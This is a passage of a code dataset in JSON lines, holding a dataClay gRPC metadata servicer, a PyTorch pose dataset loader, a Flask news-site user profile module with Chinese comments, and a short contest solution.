CloseSession(self, request, context):\n try:\n self.metadata_service.close_session(UUID(request.id))\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return Empty()\n return Empty()\n\n def GetDataclay(self, request, context):\n try:\n dataclay = self.metadata_service.get_dataclay(UUID(request.dataclay_id))\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return common_messages_pb2.Dataclay()\n return dataclay.get_proto()\n\n def GetAllBackends(self, request, context):\n try:\n backends = self.metadata_service.get_all_backends(request.from_backend)\n response = dict()\n for id, backend in backends.items():\n response[str(id)] = backend.get_proto()\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return metadata_service_pb2.GetAllBackendsResponse()\n return metadata_service_pb2.GetAllBackendsResponse(backends=response)\n\n ###################\n # Object Metadata #\n ###################\n\n # TODO: Remove it. Only EE should be able to call it.\n def RegisterObject(self, request, context):\n try:\n object_md = ObjectMetadata.from_proto(request.object_md)\n self.metadata_service.register_object(object_md, UUID(request.session_id))\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return Empty()\n return Empty()\n\n def GetObjectMDById(self, request, context):\n try:\n object_md = self.metadata_service.get_object_md_by_id(\n UUID(request.object_id),\n UUID(request.session_id),\n check_session=True,\n )\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return common_messages_pb2.ObjectMetadata()\n return object_md.get_proto()\n\n def GetObjectMDByAlias(self, request, context):\n try:\n object_md = self.metadata_service.get_object_md_by_alias(\n request.alias_name,\n request.dataset_name,\n UUID(request.session_id),\n check_session=True,\n )\n except Exception as e:\n traceback.print_exc()\n context.abort(grpc.StatusCode.INTERNAL, str(e))\n return object_md.get_proto()\n\n #########\n # Alias #\n #########\n\n def NewAlias(self, request, context):\n try:\n self.metadata_service.new_alias(\n request.alias_name,\n request.dataset_name,\n UUID(request.object_id),\n UUID(request.session_id),\n check_session=True,\n )\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return Empty()\n return Empty()\n\n def DeleteAlias(self, request, context):\n try:\n self.metadata_service.delete_alias(\n request.alias_name,\n request.dataset_name,\n UUID(request.session_id),\n check_session=True,\n )\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return Empty()\n return Empty()\n","sub_path":"src/dataclay/metadata/servicer.py","file_name":"servicer.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"310088078","text":"import torch\nimport pickle\nfrom torch.utils.data import Dataset, DataLoader\n\nclass PoseDataset(Dataset):\n def __init__(self, pickle_path):\n self.raw_data = []\n with open(pickle_path, 'rb') as f:\n self.raw_data = pickle.load(f)\n self.pairs = []\n for skel_2d, skel_3d in zip(self.raw_data['2d'], self.raw_data['3d']):\n self.pairs.append([skel_2d, skel_3d])\n self.raw_data = [] # release memory\n\n def __len__(self):\n \"\"\"Return the length of the dataset\"\"\"\n return len(self.pairs)\n\n def __getitem__(self, idx):\n \"\"\"Returns a 2D/3D upper body pose pair\n Keyword Arguments:\n idx - index of pair\n \"\"\"\n idx_upper = [0, 1, 3, 4, 5, 9, 10, 11] # upper-body joints\n pair = self.pairs[idx]\n\n # [dim x joints] -> (x1,y1,x2,y2,...)\n inputs = pair[0][:, idx_upper].T.reshape(-1) # upper-body on 2D\n # upper-body on 3D, use only z values\n outputs = pair[1][2::3, idx_upper].T.reshape(-1)\n return torch.from_numpy(inputs).float(),\\\n torch.from_numpy(outputs).float()\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"590794615","text":"from flask import render_template, g, redirect, jsonify, current_app, abort\n\nfrom info import constants, db\nfrom info.models import Category, News, User\nfrom info.utils.common import user_login_data\nfrom flask import request\n\nfrom info.utils.image_storage import storage\nfrom info.utils.response_code import RET\nfrom . import profile_blu\n\n\n# 作者新闻列表\n# 请求路径: /user/other_news_list\n# 请求方式: GET\n# 请求参数:p,user_id\n# 返回值: errno,errmsg\n@profile_blu.route('/other_news_list')\ndef other_news_list():\n \"\"\"\n 思路分析 :\n 1.获取参数\n 2.参数校验,为空判断,参数类型转换\n 3.取出作者对象\n 4.判断作者对象是否存在\n 5.分页获取作者新闻列表\n 6.获取到分页对象属性,总页数,当前页,当前页对象\n 7.返回响应,携带数据\n :return:\n \"\"\"\n # 1.获取参数\n page = request.args.get('p',1)\n author_id = request.args.get(\"user_id\")\n\n # 2.参数校验,为空判断,参数类型转换\n if not author_id:\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数不全\")\n\n try:\n page = int(page)\n except Exception as e:\n current_app.logger.error(e)\n page = 1\n\n # 3.取出作者对象\n try:\n author = User.query.get(author_id)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR,errmsg=\"获取用户失败\")\n\n # 4.判断作者对象是否存在\n if not author:\n return jsonify(errno=RET.NODATA,errmsg=\"作者不存在\")\n\n # 5.分页获取作者新闻列表\n try:\n paginate = author.news_list.order_by(News.create_time.desc()).paginate(page,constants.USER_COLLECTION_MAX_NEWS,False)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR,errmsg=\"查询新闻失败\")\n\n # 6.获取到分页对象属性,总页数,当前页,当前页对象\n total_page = paginate.pages\n current_page = paginate.page\n items = paginate.items\n\n news_list = []\n for item in items:\n news_list.append(item.to_dict())\n\n # 7.返回响应,携带数据\n data = {\n \"total_page\":total_page,\n \"current_page\":current_page,\n \"news_list\":news_list\n }\n return jsonify(errno=RET.OK,errmsg=\"获取成功\",data=data)\n\n\n\n# 作者详情界面\n# 请求路径: /user/other\n# 请求方式: GET\n# 请求参数:id\n# 返回值: 渲染other.html页面,字典data数据\n@profile_blu.route('/other')\n@user_login_data\ndef other_info():\n \"\"\"\n 思路分析:\n 1.获取作者编号\n 2.判断编号是否存在\n 3.查询作者对象\n 4.判断作者对象是否存在\n 5.拼接数据,渲染页面\n :return:\n \"\"\"\n # 1.获取作者编号\n author_id = request.args.get(\"id\")\n\n # 2.判断编号是否存在\n if not author_id:\n abort(404)\n # return jsonify(errno=RET.PARAMERR,errmsg=\"参数不全\")\n\n # 3.查询作者对象\n try:\n author = User.query.get(author_id)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR,errmsg=\"查询用户失败\")\n\n # 4.判断作者对象是否存在\n if not author:\n abort(404)\n # return jsonify(errno=RET.NODATA,errmsg=\"作者不存在\")\n\n # 4.2判断当前用户是否关注了该作者\n is_followed = False\n if g.user:\n if g.user in author.followers:\n is_followed = True\n\n\n # 5.拼接数据,渲染页面\n data = {\n \"author_info\":author.to_dict() if author else \"\",\n \"user_info\":g.user.to_dict() if g.user else \"\",\n \"is_followed\":is_followed\n }\n return render_template('news/other.html',data=data)\n\n\n# 获取我的关注列表\n# 请求路径: /user/user_follow\n# 请求方式: GET\n# 请求参数:p\n# 返回值: 渲染user_follow.html页面,字典data数据\n@profile_blu.route('/user_follow')\n@user_login_data\ndef user_follow():\n \"\"\"\n 思路分析:\n 1.获取参数\n 2.参数类型转换\n 3.分页查询数据\n 4.获取分页对象属性,总页数,当前页,当前页对象\n 5.对象列表转字典列表\n 6.拼接数据返回页面渲染\n :return:\n \"\"\"\n # 1.获取参数\n page = request.args.get(\"p\",1)\n\n # 2.参数类型转换\n try:\n page = int(page)\n except Exception as e:\n current_app.logger.error(e)\n page = 1\n\n # 3.分页查询数据\n try:\n paginate = g.user.followed.paginate(page,constants.USER_FOLLOWED_MAX_COUNT,False)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR,errmsg=\"获取用户失败\")\n\n # 4.获取分页对象属性,总页数,当前页,当前页对象\n totalPage = paginate.pages\n currentPage = paginate.page\n items = paginate.items\n\n # 5.对象列表转字典列表\n user_list = []\n for item in items:\n user_list.append(item.to_dict())\n\n # 6.拼接数据返回页面渲染\n data= {\n \"totalPage\":totalPage,\n \"currentPage\":currentPage,\n \"user_list\":user_list\n }\n return render_template('news/user_follow.html',data=data)\n\n\n@profile_blu.route('/news_list')\n@user_login_data\ndef news_list():\n user = g.user\n user_news = []\n current_page = 1\n total_page = 1\n page = request.args.get(\"p\", 1)\n\n try:\n page = int(page)\n paginate = News.query.filter_by(user_id=user.id).paginate(page, constants.USER_COLLECTION_MAX_NEWS, False)\n user_news = paginate.items\n current_page = paginate.page\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n\n news_list = []\n for news in user_news:\n news_list.append(news.to_review_dict())\n\n data = {\n 'news_list': news_list,\n 'current_page': current_page,\n 'total_page': total_page,\n }\n\n return render_template('news/user_news_list.html', data=data)\n\n@profile_blu.route('/news_release', methods=['GET', 'POST'])\n@user_login_data\ndef news_release():\n if request.method == 'GET':\n categories = []\n try:\n # 获取所有的分类数据\n categories = Category.query.all()\n except Exception as e:\n current_app.logger.error(e)\n\n # 定义列表保存分类数据\n categories_dicts = []\n\n for category in categories:\n # 获取字典\n cate_dict = category.to_dict()\n # 拼接内容\n categories_dicts.append(cate_dict)\n\n # 移除`最新`分类\n categories_dicts.pop(0)\n # 返回内容\n return render_template('news/user_news_release.html', data={\"categories\": categories_dicts})\n\n # 获取参数\n title = request.form.get('title')\n category_id = request.form.get('category_id')\n digest = request.form.get('digest')\n index_image = request.files.get('index_image')\n content = request.form.get('content')\n\n # 校验参数\n if not all([title, category_id, digest, index_image, content]):\n return jsonify(errno=RET.PARAMERR, errmsg='参数不全')\n\n # 创建新闻对象\n news = News()\n news.title = title\n news.category_id = category_id\n news.digest = digest\n news.content = content\n news.source = '个人发布'\n news.user_id = g.user.id\n news.status = 1 # 0代表审核通过,1代表审核中,-1代表审核不通过\n\n # 上传图片到七牛云\n try:\n imamg_name = storage(index_image.read())\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.THIRDERR, errmsg='上传图片失败')\n\n news.index_image_url = constants.QINIU_DOMIN_PREFIX + imamg_name\n\n try:\n db.session.add(news)\n db.session.commit()\n except Exception as e:\n current_app.logger(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR, errmsg=\"保存数据失败\" )\n\n return jsonify(errno=RET.OK, errmsg=\"发布成功\")\n\n\n\n@profile_blu.route('/collection')\n@user_login_data\ndef user_collection():\n\n # 获取参数\n page = request.args.get(\"p\", 1)\n\n # 判断参数\n try:\n page = int(page)\n except Exception as e:\n current_app.logger(e)\n page = 1\n # 查询用户指定页数的收藏新闻\n user = g.user\n news_list = []\n total_page = 1\n current_page = 1\n try:\n paginate = user.collection_news.paginate(page ,constants.USER_COLLECTION_MAX_NEWS, False)\n current_page = paginate.page\n total_page = paginate.pages\n news_list = paginate.items\n except Exception as e:\n current_app.logger.error(e)\n\n news_dict_li = []\n for news in news_list:\n news_dict_li.append(news.to_basic_dict())\n\n data = {\n \"total_page\": total_page,\n \"current_page\": current_page,\n \"collections\": news_dict_li}\n\n\n return render_template('news/user_collection.html',data=data)\n\n\n@profile_blu.route('/pass_info', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef pass_info():\n user = g.user\n if request.method == \"GET\":\n return render_template('news/user_pass_info.html')\n\n # 1.获取参数\n data_dict = request.json\n old_password = data_dict.get('old_password')\n new_password = data_dict.get('new_password')\n\n\n if not all([old_password, new_password]):\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数不全\")\n\n\n if not user.check_passowrd(old_password):\n return jsonify(errno=RET.PWDERR, errmsg=\"原密码不一致\")\n\n user.password = new_password\n try:\n db.session.commit()\n except Exception as e:\n current_app.logger(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR, errmsg=\"保存数据失败\" )\n\n return jsonify(errno=RET.OK, errmsg='保存成功')\n # 2.校验参数\n # 3.保存密码\n # 4.返回结果\n\n\n@profile_blu.route('/pic_info', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef pic_info():\n user = g.user\n if request.method == 'GET':\n return render_template('news/user_pic_info.html', data={\"user_info\": user.to_dict()})\n # 1. 获取到上传的文件\n try:\n avatar_file = request.files.get(\"avatar\").read()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.PARAMERR, errmsg=\"读取文件出错\")\n\n # 2. 再将文件上传到七牛云\n try:\n url = storage(avatar_file)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.THIRDERR, errmsg=\"上传图片失败\")\n\n # 3. 将头像信息更新到当前用户的模型中\n\n # 设置用户模型相关数据\n user.avatar_url = url\n # 将数据保存到数据库\n try:\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR, errmsg=\"保存用户数据错误\")\n\n # 4. 返回上传的结果\n return jsonify(errno=RET.OK, errmsg=\"OK\", data={\"avatar_url\": constants.QINIU_DOMIN_PREFIX + url})\n\n\n@profile_blu.route('/base_info', methods=['GET', 'POST'])\n@user_login_data\ndef base_info():\n if request.method == 'GET':\n return render_template('news/user_base_info.html', data={\"user\":g.user.to_dict()})\n\n # 代表是修改用户的数据\n # 1.取到传入的参数\n nick_name = request.json.get('nick_name')\n signature = request.json.get('signature')\n gender = request.json.get('gender')\n\n if not all(['nick_name', 'signature', 'gender']):\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数不全\")\n\n if gender not in ['MAN', 'WOMAN']:\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数错误\")\n\n user = g.user\n user.nick_name = nick_name\n user.signature = signature\n user.gender = gender\n\n return jsonify(errno=RET.OK, errmsg='OK')\n\n\n\n\n\n\n#展示个人中心\n@profile_blu.route('/show_user_info')\n@user_login_data\ndef show_user_info():\n user = g.user\n if not user:\n return redirect('/')\n\n data = {\n \"user_info\":user.to_dict() if user else \"\"\n }\n\n return render_template('news/user.html',data=data)","sub_path":"info/modules/profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"363744290","text":"#!/usr/bin/env python3\nn = int(input())\ns = input()\ngame = [0,0]\nrounds = [0,0]\nfor c in s:\n if c == 'A':\n game[0] += 1\n else:\n game[1] += 1\n if max(game) == 3:\n rounds[1 if game[1] == 3 else 0] += 1\n game = [0,0]\n if max(rounds) == n:\n print('Hannes' if rounds[0] == n else 'Arnar')\n break\n","sub_path":"2017/problems/mylla/submissions/accepted/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}